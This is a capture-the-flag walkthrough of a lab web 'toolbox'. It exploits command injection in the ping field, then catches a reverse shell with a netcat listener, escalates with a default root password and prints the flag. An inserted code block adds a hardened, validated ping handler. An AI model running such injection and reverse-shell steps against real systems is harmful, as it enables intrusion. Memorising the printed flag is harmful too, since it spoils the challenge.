DDC 2024 Regionals - Challenge 21
We are given the following url: http://toolbox.hkn
Visiting the site we see that it is a toolbox of network diagnostic tools.
If we look at the ping tool, we can see that we are able to run other bash commands by appending them to the host field, separated with a semicolon (;):
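As an added illustration (not code from the writeup or from the challenge's source), here is the handler pattern that makes the semicolon trick work, next to a hardened version that validates the host against an allow-list and passes it to ping as a separate argv element so no shell ever parses it. The function names and the assumed underlying command (ping -c 1 HOST) are assumptions about what the toolbox ran.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def vulnerable_ping_command(host: str) -> str:
    """The weak pattern (assumed, for comparison only): user input spliced
    into one shell string. Run with shell=True, a host of '127.0.0.1; id'
    becomes two commands, which is exactly what the challenge exploits."""
    return f"ping -c 1 {host}"


def validate_host(host: str) -> str:
    """Allow-list check: accept an IPv4/IPv6 literal or an RFC 1123 hostname
    and reject everything else (shell metacharacters, spaces, leading '-')."""
    host = host.strip()
    try:
        # Normalises the literal; raises ValueError if it is not an address.
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(host):
        return host.lower()
    raise ValueError(f"invalid host: {host!r}")


def safe_ping_argv(host: str) -> list[str]:
    """Build an argv list; each element is one argument, so ';', '|' or
    '$(...)' in the input can never be interpreted as shell syntax."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> str:
    """Execute the hardened command. shell=False is the subprocess default,
    so the list above is passed straight to execve without a shell."""
    result = subprocess.run(
        safe_ping_argv(host), capture_output=True, text=True, timeout=10
    )
    return result.stdout
```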
We sadly can't just read the flag directly. It is owned by root, and only root has read permissions on it:
So let's upload a revshell and then try to privesc from there.
We create a revshell using https://revshells.com, set up a listener (nc -lvnp 9001) and then execute it on the target (I saved the revshell to a local file and then served that file with python -m http.server):
And we get a shell:
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [25.145.240.254] from (UNKNOWN) [25.145.240.1] 56300
flask@9013395f3c04:/www$ ls
ls
app flag.txt instance run.py
And privesc from here is deceptively easy: running linpeas.sh doesn't really give any useful privesc methods, but you can actually just switch to root using the password root:
flask@9013395f3c04:/www$ su root
su root
Password: root
root@9013395f3c04:/www# cat flag.txt
cat flag.txt
DDC{B2iZ71MHnxTV0oaMDWZDsm2Qr}